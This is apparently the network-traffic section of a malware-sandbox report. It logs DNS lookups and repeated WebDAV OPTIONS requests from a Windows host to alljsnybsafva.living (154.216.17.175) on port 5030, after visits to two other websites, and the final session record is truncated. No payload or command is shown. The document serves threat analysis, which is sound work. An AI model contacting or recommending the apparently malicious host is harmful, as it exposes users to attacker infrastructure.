Jan 14, 2025 21:14:02.561775923 CET	49714	443	192.168.2.5	27.123.25.1
Jan 14, 2025 21:14:02.561783075 CET	443	49714	27.123.25.1	192.168.2.5
Jan 14, 2025 21:14:02.561794043 CET	443	49714	27.123.25.1	192.168.2.5
Jan 14, 2025 21:14:02.561837912 CET	49714	443	192.168.2.5	27.123.25.1
Jan 14, 2025 21:14:02.561845064 CET	443	49714	27.123.25.1	192.168.2.5
Jan 14, 2025 21:14:02.561907053 CET	443	49714	27.123.25.1	192.168.2.5
Jan 14, 2025 21:14:02.561963081 CET	49714	443	192.168.2.5	27.123.25.1
Jan 14, 2025 21:14:02.562627077 CET	49714	443	192.168.2.5	27.123.25.1
Jan 14, 2025 21:14:02.562640905 CET	443	49714	27.123.25.1	192.168.2.5
Jan 14, 2025 21:14:02.627377033 CET	49716	443	192.168.2.5	68.183.112.81
Jan 14, 2025 21:14:02.627412081 CET	443	49716	68.183.112.81	192.168.2.5
Jan 14, 2025 21:14:02.627470970 CET	49716	443	192.168.2.5	68.183.112.81
Jan 14, 2025 21:14:02.627682924 CET	49716	443	192.168.2.5	68.183.112.81
Jan 14, 2025 21:14:02.627698898 CET	443	49716	68.183.112.81	192.168.2.5
Jan 14, 2025 21:14:03.219064951 CET	443	49716	68.183.112.81	192.168.2.5
Jan 14, 2025 21:14:03.219402075 CET	49716	443	192.168.2.5	68.183.112.81
Jan 14, 2025 21:14:03.219417095 CET	443	49716	68.183.112.81	192.168.2.5
Jan 14, 2025 21:14:03.220865011 CET	443	49716	68.183.112.81	192.168.2.5
Jan 14, 2025 21:14:03.220932961 CET	49716	443	192.168.2.5	68.183.112.81
Jan 14, 2025 21:14:03.222713947 CET	49716	443	192.168.2.5	68.183.112.81
Jan 14, 2025 21:14:03.222790003 CET	443	49716	68.183.112.81	192.168.2.5
Jan 14, 2025 21:14:03.223011971 CET	49716	443	192.168.2.5	68.183.112.81
Jan 14, 2025 21:14:03.223018885 CET	443	49716	68.183.112.81	192.168.2.5
Jan 14, 2025 21:14:03.266885996 CET	49716	443	192.168.2.5	68.183.112.81
Jan 14, 2025 21:14:03.322438002 CET	443	49716	68.183.112.81	192.168.2.5
Jan 14, 2025 21:14:03.322469950 CET	443	49716	68.183.112.81	192.168.2.5
Jan 14, 2025 21:14:03.322479963 CET	443	49716	68.183.112.81	192.168.2.5
Jan 14, 2025 21:14:03.322520018 CET	49716	443	192.168.2.5	68.183.112.81
Jan 14, 2025 21:14:03.322535038 CET	443	49716	68.183.112.81	192.168.2.5
Jan 14, 2025 21:14:03.322774887 CET	443	49716	68.183.112.81	192.168.2.5
Jan 14, 2025 21:14:03.322818041 CET	49716	443	192.168.2.5	68.183.112.81
Jan 14, 2025 21:14:03.324475050 CET	49716	443	192.168.2.5	68.183.112.81
Jan 14, 2025 21:14:03.324495077 CET	443	49716	68.183.112.81	192.168.2.5
Jan 14, 2025 21:14:03.324505091 CET	49716	443	192.168.2.5	68.183.112.81
Jan 14, 2025 21:14:03.324536085 CET	49716	443	192.168.2.5	68.183.112.81
Jan 14, 2025 21:14:03.361263037 CET	49717	443	192.168.2.5	68.183.112.81
Jan 14, 2025 21:14:03.361321926 CET	443	49717	68.183.112.81	192.168.2.5
Jan 14, 2025 21:14:03.361380100 CET	49717	443	192.168.2.5	68.183.112.81
Jan 14, 2025 21:14:03.361567974 CET	49717	443	192.168.2.5	68.183.112.81
Jan 14, 2025 21:14:03.361593962 CET	443	49717	68.183.112.81	192.168.2.5
Jan 14, 2025 21:14:03.814929008 CET	443	49717	68.183.112.81	192.168.2.5
Jan 14, 2025 21:14:03.815238953 CET	49717	443	192.168.2.5	68.183.112.81
Jan 14, 2025 21:14:03.815280914 CET	443	49717	68.183.112.81	192.168.2.5
Jan 14, 2025 21:14:03.816776037 CET	443	49717	68.183.112.81	192.168.2.5
Jan 14, 2025 21:14:03.816853046 CET	49717	443	192.168.2.5	68.183.112.81
Jan 14, 2025 21:14:03.817270041 CET	49717	443	192.168.2.5	68.183.112.81
Jan 14, 2025 21:14:03.817363977 CET	443	49717	68.183.112.81	192.168.2.5
Jan 14, 2025 21:14:03.817423105 CET	49717	443	192.168.2.5	68.183.112.81
Jan 14, 2025 21:14:03.860872984 CET	49717	443	192.168.2.5	68.183.112.81
Jan 14, 2025 21:14:03.860894918 CET	443	49717	68.183.112.81	192.168.2.5
Jan 14, 2025 21:14:03.907758951 CET	49717	443	192.168.2.5	68.183.112.81
Jan 14, 2025 21:14:03.939476013 CET	443	49717	68.183.112.81	192.168.2.5
Jan 14, 2025 21:14:03.939502001 CET	443	49717	68.183.112.81	192.168.2.5
Jan 14, 2025 21:14:03.939516068 CET	443	49717	68.183.112.81	192.168.2.5
Jan 14, 2025 21:14:03.939549923 CET	443	49717	68.183.112.81	192.168.2.5
Jan 14, 2025 21:14:03.939604998 CET	49717	443	192.168.2.5	68.183.112.81
Jan 14, 2025 21:14:03.939620018 CET	443	49717	68.183.112.81	192.168.2.5
Jan 14, 2025 21:14:03.939629078 CET	443	49717	68.183.112.81	192.168.2.5
Jan 14, 2025 21:14:03.939661980 CET	49717	443	192.168.2.5	68.183.112.81
Jan 14, 2025 21:14:03.939858913 CET	49717	443	192.168.2.5	68.183.112.81
Jan 14, 2025 21:14:03.944911957 CET	49717	443	192.168.2.5	68.183.112.81
Jan 14, 2025 21:14:03.944922924 CET	443	49717	68.183.112.81	192.168.2.5
Jan 14, 2025 21:14:08.938407898 CET	443	49711	142.250.186.100	192.168.2.5
Jan 14, 2025 21:14:08.938565016 CET	443	49711	142.250.186.100	192.168.2.5
Jan 14, 2025 21:14:08.938625097 CET	49711	443	192.168.2.5	142.250.186.100
Jan 14, 2025 21:14:10.424138069 CET	49711	443	192.168.2.5	142.250.186.100
Jan 14, 2025 21:14:10.424173117 CET	443	49711	142.250.186.100	192.168.2.5
Jan 14, 2025 21:14:15.948117018 CET	49768	5030	192.168.2.5	154.216.17.175
Jan 14, 2025 21:14:15.953152895 CET	5030	49768	154.216.17.175	192.168.2.5
Jan 14, 2025 21:14:15.953318119 CET	49768	5030	192.168.2.5	154.216.17.175
Jan 14, 2025 21:14:15.953361034 CET	49768	5030	192.168.2.5	154.216.17.175
Jan 14, 2025 21:14:15.958250046 CET	5030	49768	154.216.17.175	192.168.2.5
Jan 14, 2025 21:14:16.616935968 CET	5030	49768	154.216.17.175	192.168.2.5
Jan 14, 2025 21:14:16.673168898 CET	49768	5030	192.168.2.5	154.216.17.175
Jan 14, 2025 21:14:19.835742950 CET	49793	5030	192.168.2.5	154.216.17.175
Jan 14, 2025 21:14:19.840666056 CET	5030	49793	154.216.17.175	192.168.2.5
Jan 14, 2025 21:14:19.840780973 CET	49793	5030	192.168.2.5	154.216.17.175
Jan 14, 2025 21:14:19.840972900 CET	49793	5030	192.168.2.5	154.216.17.175
Jan 14, 2025 21:14:19.845766068 CET	5030	49793	154.216.17.175	192.168.2.5
Jan 14, 2025 21:14:20.504077911 CET	5030	49793	154.216.17.175	192.168.2.5
Jan 14, 2025 21:14:20.547514915 CET	49793	5030	192.168.2.5	154.216.17.175
Jan 14, 2025 21:14:20.691802979 CET	49798	5030	192.168.2.5	154.216.17.175
Jan 14, 2025 21:14:20.696691036 CET	5030	49798	154.216.17.175	192.168.2.5
Jan 14, 2025 21:14:20.696970940 CET	49798	5030	192.168.2.5	154.216.17.175
Jan 14, 2025 21:14:20.697285891 CET	49798	5030	192.168.2.5	154.216.17.175
Jan 14, 2025 21:14:20.702136993 CET	5030	49798	154.216.17.175	192.168.2.5
Jan 14, 2025 21:14:21.364295006 CET	443	49715	27.123.25.1	192.168.2.5
Jan 14, 2025 21:14:21.364408016 CET	443	49715	27.123.25.1	192.168.2.5
Jan 14, 2025 21:14:21.364531040 CET	49715	443	192.168.2.5	27.123.25.1
Jan 14, 2025 21:14:21.370295048 CET	5030	49798	154.216.17.175	192.168.2.5
Jan 14, 2025 21:14:21.423264980 CET	49798	5030	192.168.2.5	154.216.17.175
Jan 14, 2025 21:14:21.499372005 CET	5030	49798	154.216.17.175	192.168.2.5
Jan 14, 2025 21:14:21.514223099 CET	49803	5030	192.168.2.5	154.216.17.175
Jan 14, 2025 21:14:21.519134998 CET	5030	49803	154.216.17.175	192.168.2.5
Jan 14, 2025 21:14:21.519236088 CET	49803	5030	192.168.2.5	154.216.17.175
Jan 14, 2025 21:14:21.519726038 CET	49803	5030	192.168.2.5	154.216.17.175
Jan 14, 2025 21:14:21.524563074 CET	5030	49803	154.216.17.175	192.168.2.5
Jan 14, 2025 21:14:21.548330069 CET	49798	5030	192.168.2.5	154.216.17.175
Jan 14, 2025 21:14:22.199282885 CET	5030	49803	154.216.17.175	192.168.2.5
Jan 14, 2025 21:14:22.206094027 CET	49806	5030	192.168.2.5	154.216.17.175
Jan 14, 2025 21:14:22.210952997 CET	5030	49806	154.216.17.175	192.168.2.5
Jan 14, 2025 21:14:22.211035013 CET	49806	5030	192.168.2.5	154.216.17.175
Jan 14, 2025 21:14:22.211194038 CET	49806	5030	192.168.2.5	154.216.17.175
Jan 14, 2025 21:14:22.215955973 CET	5030	49806	154.216.17.175	192.168.2.5
Jan 14, 2025 21:14:22.251517057 CET	49803	5030	192.168.2.5	154.216.17.175
Jan 14, 2025 21:14:22.425538063 CET	49715	443	192.168.2.5	27.123.25.1
Jan 14, 2025 21:14:22.425592899 CET	443	49715	27.123.25.1	192.168.2.5
Jan 14, 2025 21:14:22.897486925 CET	5030	49806	154.216.17.175	192.168.2.5
Jan 14, 2025 21:14:22.938890934 CET	49806	5030	192.168.2.5	154.216.17.175
Jan 14, 2025 21:14:23.032746077 CET	5030	49806	154.216.17.175	192.168.2.5
Jan 14, 2025 21:14:23.079528093 CET	49806	5030	192.168.2.5	154.216.17.175
Jan 14, 2025 21:14:23.775707960 CET	49813	5030	192.168.2.5	154.216.17.175
Jan 14, 2025 21:14:23.780621052 CET	5030	49813	154.216.17.175	192.168.2.5
Jan 14, 2025 21:14:23.780734062 CET	49813	5030	192.168.2.5	154.216.17.175
Jan 14, 2025 21:14:23.781179905 CET	49813	5030	192.168.2.5	154.216.17.175
Jan 14, 2025 21:14:23.785958052 CET	5030	49813	154.216.17.175	192.168.2.5
Jan 14, 2025 21:14:24.471175909 CET	5030	49813	154.216.17.175	192.168.2.5
Jan 14, 2025 21:14:24.522268057 CET	49813	5030	192.168.2.5	154.216.17.175
Jan 14, 2025 21:14:24.603230000 CET	5030	49813	154.216.17.175	192.168.2.5
Jan 14, 2025 21:14:24.608481884 CET	49819	5030	192.168.2.5	154.216.17.175
Jan 14, 2025 21:14:24.613321066 CET	5030	49819	154.216.17.175	192.168.2.5
Jan 14, 2025 21:14:24.613393068 CET	49819	5030	192.168.2.5	154.216.17.175
Jan 14, 2025 21:14:24.613521099 CET	49819	5030	192.168.2.5	154.216.17.175
Jan 14, 2025 21:14:24.618248940 CET	5030	49819	154.216.17.175	192.168.2.5
Jan 14, 2025 21:14:24.647275925 CET	49813	5030	192.168.2.5	154.216.17.175
Jan 14, 2025 21:14:25.283987999 CET	5030	49819	154.216.17.175	192.168.2.5
Jan 14, 2025 21:14:25.284018993 CET	5030	49819	154.216.17.175	192.168.2.5
Jan 14, 2025 21:14:25.284029961 CET	5030	49819	154.216.17.175	192.168.2.5
Jan 14, 2025 21:14:25.284065962 CET	49819	5030	192.168.2.5	154.216.17.175
Jan 14, 2025 21:14:25.296485901 CET	49825	5030	192.168.2.5	154.216.17.175
Jan 14, 2025 21:14:25.301259041 CET	5030	49825	154.216.17.175	192.168.2.5
Jan 14, 2025 21:14:25.301317930 CET	49825	5030	192.168.2.5	154.216.17.175
Jan 14, 2025 21:14:25.301414013 CET	49825	5030	192.168.2.5	154.216.17.175
Jan 14, 2025 21:14:25.306134939 CET	5030	49825	154.216.17.175	192.168.2.5
Jan 14, 2025 21:14:25.971527100 CET	5030	49825	154.216.17.175	192.168.2.5
Jan 14, 2025 21:14:25.971560955 CET	5030	49825	154.216.17.175	192.168.2.5
Jan 14, 2025 21:14:25.971573114 CET	5030	49825	154.216.17.175	192.168.2.5
Jan 14, 2025 21:14:25.971612930 CET	49825	5030	192.168.2.5	154.216.17.175
Jan 14, 2025 21:14:26.016962051 CET	49825	5030	192.168.2.5	154.216.17.175
Jan 14, 2025 21:14:26.036196947 CET	49831	5030	192.168.2.5	154.216.17.175
Jan 14, 2025 21:14:26.041099072 CET	5030	49831	154.216.17.175	192.168.2.5
Jan 14, 2025 21:14:26.041181087 CET	49831	5030	192.168.2.5	154.216.17.175
Jan 14, 2025 21:14:26.041327953 CET	49831	5030	192.168.2.5	154.216.17.175
Jan 14, 2025 21:14:26.046082020 CET	5030	49831	154.216.17.175	192.168.2.5
Jan 14, 2025 21:14:26.183043003 CET	49833	443	192.168.2.5	104.16.230.132
Jan 14, 2025 21:14:26.183087111 CET	443	49833	104.16.230.132	192.168.2.5
Jan 14, 2025 21:14:26.183219910 CET	49833	443	192.168.2.5	104.16.230.132
Jan 14, 2025 21:14:26.184173107 CET	49833	443	192.168.2.5	104.16.230.132
Jan 14, 2025 21:14:26.184194088 CET	443	49833	104.16.230.132	192.168.2.5
Jan 14, 2025 21:14:26.661103964 CET	443	49833	104.16.230.132	192.168.2.5
Jan 14, 2025 21:14:26.661184072 CET	49833	443	192.168.2.5	104.16.230.132
Jan 14, 2025 21:14:26.673120022 CET	49833	443	192.168.2.5	104.16.230.132
Jan 14, 2025 21:14:26.673142910 CET	443	49833	104.16.230.132	192.168.2.5
Jan 14, 2025 21:14:26.673537016 CET	443	49833	104.16.230.132	192.168.2.5
Jan 14, 2025 21:14:26.715850115 CET	5030	49831	154.216.17.175	192.168.2.5
Jan 14, 2025 21:14:26.723051071 CET	49833	443	192.168.2.5	104.16.230.132
Jan 14, 2025 21:14:26.733175993 CET	49833	443	192.168.2.5	104.16.230.132
Jan 14, 2025 21:14:26.775333881 CET	443	49833	104.16.230.132	192.168.2.5
Jan 14, 2025 21:14:26.782459021 CET	49831	5030	192.168.2.5	154.216.17.175
Jan 14, 2025 21:14:26.918715000 CET	5030	49768	154.216.17.175	192.168.2.5
Jan 14, 2025 21:14:26.918819904 CET	49768	5030	192.168.2.5	154.216.17.175
Jan 14, 2025 21:14:26.918876886 CET	49768	5030	192.168.2.5	154.216.17.175
Jan 14, 2025 21:14:26.923667908 CET	5030	49768	154.216.17.175	192.168.2.5
Jan 14, 2025 21:14:27.158554077 CET	443	49833	104.16.230.132	192.168.2.5
Jan 14, 2025 21:14:27.158675909 CET	443	49833	104.16.230.132	192.168.2.5
Jan 14, 2025 21:14:27.158787012 CET	49833	443	192.168.2.5	104.16.230.132
Jan 14, 2025 21:14:27.159060001 CET	49833	443	192.168.2.5	104.16.230.132
Jan 14, 2025 21:14:27.159076929 CET	443	49833	104.16.230.132	192.168.2.5
Jan 14, 2025 21:14:27.159086943 CET	49833	443	192.168.2.5	104.16.230.132
Jan 14, 2025 21:14:27.159092903 CET	443	49833	104.16.230.132	192.168.2.5
Jan 14, 2025 21:14:27.299635887 CET	49840	443	192.168.2.5	104.16.230.132
Jan 14, 2025 21:14:27.299678087 CET	443	49840	104.16.230.132	192.168.2.5
Jan 14, 2025 21:14:27.299772024 CET	49840	443	192.168.2.5	104.16.230.132
Jan 14, 2025 21:14:27.300071955 CET	49840	443	192.168.2.5	104.16.230.132
Jan 14, 2025 21:14:27.300086975 CET	443	49840	104.16.230.132	192.168.2.5
Jan 14, 2025 21:14:27.779805899 CET	443	49840	104.16.230.132	192.168.2.5
Jan 14, 2025 21:14:27.779881001 CET	49840	443	192.168.2.5	104.16.230.132
Jan 14, 2025 21:14:27.780997992 CET	49840	443	192.168.2.5	104.16.230.132
Jan 14, 2025 21:14:27.781008959 CET	443	49840	104.16.230.132	192.168.2.5
Jan 14, 2025 21:14:27.781217098 CET	443	49840	104.16.230.132	192.168.2.5
Jan 14, 2025 21:14:27.782145023 CET	49840	443	192.168.2.5	104.16.230.132
Jan 14, 2025 21:14:27.827332973 CET	443	49840	104.16.230.132	192.168.2.5
Jan 14, 2025 21:14:28.056797981 CET	443	49840	104.16.230.132	192.168.2.5
Jan 14, 2025 21:14:28.056854963 CET	443	49840	104.16.230.132	192.168.2.5
Jan 14, 2025 21:14:28.056922913 CET	49840	443	192.168.2.5	104.16.230.132
Jan 14, 2025 21:14:28.057188034 CET	49840	443	192.168.2.5	104.16.230.132
Jan 14, 2025 21:14:28.057205915 CET	443	49840	104.16.230.132	192.168.2.5
Jan 14, 2025 21:14:28.057216883 CET	49840	443	192.168.2.5	104.16.230.132
Jan 14, 2025 21:14:28.057224035 CET	443	49840	104.16.230.132	192.168.2.5
Jan 14, 2025 21:14:28.059864044 CET	49845	443	192.168.2.5	104.16.230.132
Jan 14, 2025 21:14:28.059895992 CET	443	49845	104.16.230.132	192.168.2.5
Jan 14, 2025 21:14:28.059951067 CET	49845	443	192.168.2.5	104.16.230.132
Jan 14, 2025 21:14:28.060117006 CET	49845	443	192.168.2.5	104.16.230.132
Jan 14, 2025 21:14:28.060129881 CET	443	49845	104.16.230.132	192.168.2.5
Jan 14, 2025 21:14:28.515295982 CET	443	49845	104.16.230.132	192.168.2.5
Jan 14, 2025 21:14:28.515719891 CET	49845	443	192.168.2.5	104.16.230.132
Jan 14, 2025 21:14:28.515747070 CET	443	49845	104.16.230.132	192.168.2.5
Jan 14, 2025 21:14:28.516365051 CET	49845	443	192.168.2.5	104.16.230.132
Jan 14, 2025 21:14:28.516371965 CET	443	49845	104.16.230.132	192.168.2.5
Jan 14, 2025 21:14:28.800961018 CET	443	49845	104.16.230.132	192.168.2.5
Jan 14, 2025 21:14:28.801012039 CET	443	49845	104.16.230.132	192.168.2.5
Jan 14, 2025 21:14:28.801214933 CET	49845	443	192.168.2.5	104.16.230.132
Jan 14, 2025 21:14:28.801265001 CET	49845	443	192.168.2.5	104.16.230.132
Jan 14, 2025 21:14:28.801273108 CET	443	49845	104.16.230.132	192.168.2.5
Jan 14, 2025 21:14:28.801289082 CET	49845	443	192.168.2.5	104.16.230.132
Jan 14, 2025 21:14:28.801294088 CET	443	49845	104.16.230.132	192.168.2.5
Jan 14, 2025 21:14:30.983383894 CET	5030	49793	154.216.17.175	192.168.2.5
Jan 14, 2025 21:14:30.983448029 CET	49793	5030	192.168.2.5	154.216.17.175
Jan 14, 2025 21:14:30.983540058 CET	49793	5030	192.168.2.5	154.216.17.175
Jan 14, 2025 21:14:30.988353968 CET	5030	49793	154.216.17.175	192.168.2.5
Jan 14, 2025 21:14:31.484863997 CET	5030	49798	154.216.17.175	192.168.2.5
Jan 14, 2025 21:14:31.484997988 CET	49798	5030	192.168.2.5	154.216.17.175
Jan 14, 2025 21:14:31.484997988 CET	49798	5030	192.168.2.5	154.216.17.175
Jan 14, 2025 21:14:31.489799976 CET	5030	49798	154.216.17.175	192.168.2.5
Jan 14, 2025 21:14:32.551139116 CET	5030	49803	154.216.17.175	192.168.2.5
Jan 14, 2025 21:14:32.551193953 CET	49803	5030	192.168.2.5	154.216.17.175
Jan 14, 2025 21:14:32.551282883 CET	49803	5030	192.168.2.5	154.216.17.175
Jan 14, 2025 21:14:32.555994034 CET	5030	49803	154.216.17.175	192.168.2.5
Jan 14, 2025 21:14:33.052452087 CET	5030	49806	154.216.17.175	192.168.2.5
Jan 14, 2025 21:14:33.052542925 CET	49806	5030	192.168.2.5	154.216.17.175
Jan 14, 2025 21:14:33.053162098 CET	49806	5030	192.168.2.5	154.216.17.175
Jan 14, 2025 21:14:33.057929993 CET	5030	49806	154.216.17.175	192.168.2.5
Jan 14, 2025 21:14:34.552233934 CET	5030	49813	154.216.17.175	192.168.2.5
Jan 14, 2025 21:14:34.552421093 CET	49813	5030	192.168.2.5	154.216.17.175
Jan 14, 2025 21:14:34.552495956 CET	49813	5030	192.168.2.5	154.216.17.175
Jan 14, 2025 21:14:34.557357073 CET	5030	49813	154.216.17.175	192.168.2.5
Jan 14, 2025 21:14:35.553612947 CET	5030	49819	154.216.17.175	192.168.2.5
Jan 14, 2025 21:14:35.553673983 CET	49819	5030	192.168.2.5	154.216.17.175
Jan 14, 2025 21:14:35.553745031 CET	49819	5030	192.168.2.5	154.216.17.175
Jan 14, 2025 21:14:35.558475971 CET	5030	49819	154.216.17.175	192.168.2.5
Jan 14, 2025 21:14:36.052788973 CET	5030	49825	154.216.17.175	192.168.2.5
Jan 14, 2025 21:14:36.052853107 CET	49825	5030	192.168.2.5	154.216.17.175
Jan 14, 2025 21:14:36.052962065 CET	49825	5030	192.168.2.5	154.216.17.175
Jan 14, 2025 21:14:36.057712078 CET	5030	49825	154.216.17.175	192.168.2.5
Jan 14, 2025 21:14:37.052397966 CET	5030	49831	154.216.17.175	192.168.2.5
Jan 14, 2025 21:14:37.052578926 CET	49831	5030	192.168.2.5	154.216.17.175
Jan 14, 2025 21:14:37.052619934 CET	49831	5030	192.168.2.5	154.216.17.175
Jan 14, 2025 21:14:37.057471037 CET	5030	49831	154.216.17.175	192.168.2.5
Jan 14, 2025 21:14:58.393742085 CET	50005	443	192.168.2.5	142.250.186.100
Jan 14, 2025 21:14:58.393800020 CET	443	50005	142.250.186.100	192.168.2.5
Jan 14, 2025 21:14:58.394113064 CET	50005	443	192.168.2.5	142.250.186.100
Jan 14, 2025 21:14:58.394113064 CET	50005	443	192.168.2.5	142.250.186.100
Jan 14, 2025 21:14:58.394155025 CET	443	50005	142.250.186.100	192.168.2.5
Jan 14, 2025 21:14:59.022819996 CET	443	50005	142.250.186.100	192.168.2.5
Jan 14, 2025 21:14:59.023102999 CET	50005	443	192.168.2.5	142.250.186.100
Jan 14, 2025 21:14:59.023128986 CET	443	50005	142.250.186.100	192.168.2.5
Jan 14, 2025 21:14:59.023452044 CET	443	50005	142.250.186.100	192.168.2.5
Jan 14, 2025 21:14:59.023793936 CET	50005	443	192.168.2.5	142.250.186.100
Jan 14, 2025 21:14:59.023849010 CET	443	50005	142.250.186.100	192.168.2.5
Jan 14, 2025 21:14:59.063776016 CET	50005	443	192.168.2.5	142.250.186.100
Jan 14, 2025 21:15:08.936862946 CET	443	50005	142.250.186.100	192.168.2.5
Jan 14, 2025 21:15:08.936942101 CET	443	50005	142.250.186.100	192.168.2.5
Jan 14, 2025 21:15:08.937011957 CET	50005	443	192.168.2.5	142.250.186.100
Jan 14, 2025 21:15:10.424877882 CET	50005	443	192.168.2.5	142.250.186.100
Jan 14, 2025 21:15:10.424922943 CET	443	50005	142.250.186.100	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 14, 2025 21:13:53.949800014 CET	53	50362	1.1.1.1	192.168.2.5
Jan 14, 2025 21:13:53.975526094 CET	53	50893	1.1.1.1	192.168.2.5
Jan 14, 2025 21:13:55.008502007 CET	53	60999	1.1.1.1	192.168.2.5
Jan 14, 2025 21:13:58.330825090 CET	55126	53	192.168.2.5	1.1.1.1
Jan 14, 2025 21:13:58.331231117 CET	55141	53	192.168.2.5	1.1.1.1
Jan 14, 2025 21:13:58.337677002 CET	53	55141	1.1.1.1	192.168.2.5
Jan 14, 2025 21:13:58.338248014 CET	53	55126	1.1.1.1	192.168.2.5
Jan 14, 2025 21:14:00.047255993 CET	52509	53	192.168.2.5	1.1.1.1
Jan 14, 2025 21:14:00.047427893 CET	54718	53	192.168.2.5	1.1.1.1
Jan 14, 2025 21:14:00.067099094 CET	53	52509	1.1.1.1	192.168.2.5
Jan 14, 2025 21:14:00.302287102 CET	53	54718	1.1.1.1	192.168.2.5
Jan 14, 2025 21:14:02.592540979 CET	63457	53	192.168.2.5	1.1.1.1
Jan 14, 2025 21:14:02.592756033 CET	52487	53	192.168.2.5	1.1.1.1
Jan 14, 2025 21:14:02.614886045 CET	53	63457	1.1.1.1	192.168.2.5
Jan 14, 2025 21:14:02.659627914 CET	53	52487	1.1.1.1	192.168.2.5
Jan 14, 2025 21:14:03.331944942 CET	57600	53	192.168.2.5	1.1.1.1
Jan 14, 2025 21:14:03.332374096 CET	56497	53	192.168.2.5	1.1.1.1
Jan 14, 2025 21:14:03.349843979 CET	53	57600	1.1.1.1	192.168.2.5
Jan 14, 2025 21:14:03.383014917 CET	53	56497	1.1.1.1	192.168.2.5
Jan 14, 2025 21:14:12.134099007 CET	53	55376	1.1.1.1	192.168.2.5
Jan 14, 2025 21:14:15.568006992 CET	56201	53	192.168.2.5	1.1.1.1
Jan 14, 2025 21:14:15.943583012 CET	53	56201	1.1.1.1	192.168.2.5
Jan 14, 2025 21:14:30.966552019 CET	53	53476	1.1.1.1	192.168.2.5
Jan 14, 2025 21:14:53.557327986 CET	53	65258	1.1.1.1	192.168.2.5
Jan 14, 2025 21:14:53.761451960 CET	53	60034	1.1.1.1	192.168.2.5

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Jan 14, 2025 21:14:00.302375078 CET	192.168.2.5	1.1.1.1	c243	(Port unreachable)	Destination Unreachable
Jan 14, 2025 21:14:02.659724951 CET	192.168.2.5	1.1.1.1	c222	(Port unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 14, 2025 21:13:58.330825090 CET	192.168.2.5	1.1.1.1	0x2d26	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Jan 14, 2025 21:13:58.331231117 CET	192.168.2.5	1.1.1.1	0x1e1d	Standard query (0)	www.google.com	65	IN (0x0001)	false
Jan 14, 2025 21:14:00.047255993 CET	192.168.2.5	1.1.1.1	0xfc7d	Standard query (0)	caringforyousupport.com.au	A (IP address)	IN (0x0001)	false
Jan 14, 2025 21:14:00.047427893 CET	192.168.2.5	1.1.1.1	0x857b	Standard query (0)	caringforyousupport.com.au	65	IN (0x0001)	false
Jan 14, 2025 21:14:02.592540979 CET	192.168.2.5	1.1.1.1	0xd93f	Standard query (0)	winaero.com	A (IP address)	IN (0x0001)	false
Jan 14, 2025 21:14:02.592756033 CET	192.168.2.5	1.1.1.1	0xfa26	Standard query (0)	winaero.com	65	IN (0x0001)	false
Jan 14, 2025 21:14:03.331944942 CET	192.168.2.5	1.1.1.1	0xd29b	Standard query (0)	winaero.com	A (IP address)	IN (0x0001)	false
Jan 14, 2025 21:14:03.332374096 CET	192.168.2.5	1.1.1.1	0x8cb1	Standard query (0)	winaero.com	65	IN (0x0001)	false
Jan 14, 2025 21:14:15.568006992 CET	192.168.2.5	1.1.1.1	0x73dd	Standard query (0)	alljsnybsafva.living	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Jan 14, 2025 21:13:58.337677002 CET	1.1.1.1	192.168.2.5	0x1e1d	No error (0)	www.google.com		65	IN (0x0001)	false
Jan 14, 2025 21:13:58.338248014 CET	1.1.1.1	192.168.2.5	0x2d26	No error (0)	www.google.com	142.250.186.100	A (IP address)	IN (0x0001)	false
Jan 14, 2025 21:14:00.067099094 CET	1.1.1.1	192.168.2.5	0xfc7d	No error (0)	caringforyousupport.com.au	27.123.25.1	A (IP address)	IN (0x0001)	false
Jan 14, 2025 21:14:02.614886045 CET	1.1.1.1	192.168.2.5	0xd93f	No error (0)	winaero.com	68.183.112.81	A (IP address)	IN (0x0001)	false
Jan 14, 2025 21:14:03.349843979 CET	1.1.1.1	192.168.2.5	0xd29b	No error (0)	winaero.com	68.183.112.81	A (IP address)	IN (0x0001)	false
Jan 14, 2025 21:14:15.943583012 CET	1.1.1.1	192.168.2.5	0x73dd	No error (0)	alljsnybsafva.living	154.216.17.175	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

caringforyousupport.com.au

https:

winaero.com

alljsnybsafva.living:5030

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49768	154.216.17.175	5030	3668	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
Jan 14, 2025 21:14:15.953361034 CET	114	OUT	OPTIONS / HTTP/1.1 Connection: Keep-Alive User-Agent: DavClnt translate: f Host: alljsnybsafva.living:5030
Jan 14, 2025 21:14:16.616935968 CET	278	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Content-Length: 0 DAV: 1,2 Date: Tue, 14 Jan 2025 20:14:16 GMT Allow: OPTIONS, HEAD, GET, PROPFIND, DELETE, COPY, MOVE, PROPPATCH, LOCK, UNLOCK MS-Author-Via: DAV Server: WsgiDAV/4.3.0 Cheroot/9.0.0 Python/3.11.1

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49793	154.216.17.175	5030

Timestamp	Bytes transferred	Direction	Data
Jan 14, 2025 21:14:19.840972900 CET	144	OUT	OPTIONS / HTTP/1.1 Connection: Keep-Alive User-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045 translate: f Host: alljsnybsafva.living:5030
Jan 14, 2025 21:14:20.504077911 CET	278	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Content-Length: 0 DAV: 1,2 Date: Tue, 14 Jan 2025 20:14:20 GMT Allow: OPTIONS, HEAD, GET, PROPFIND, DELETE, COPY, MOVE, PROPPATCH, LOCK, UNLOCK MS-Author-Via: DAV Server: WsgiDAV/4.3.0 Cheroot/9.0.0 Python/3.11.1

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49798	154.216.17.175	5030

Timestamp	Bytes transferred	Direction	Data
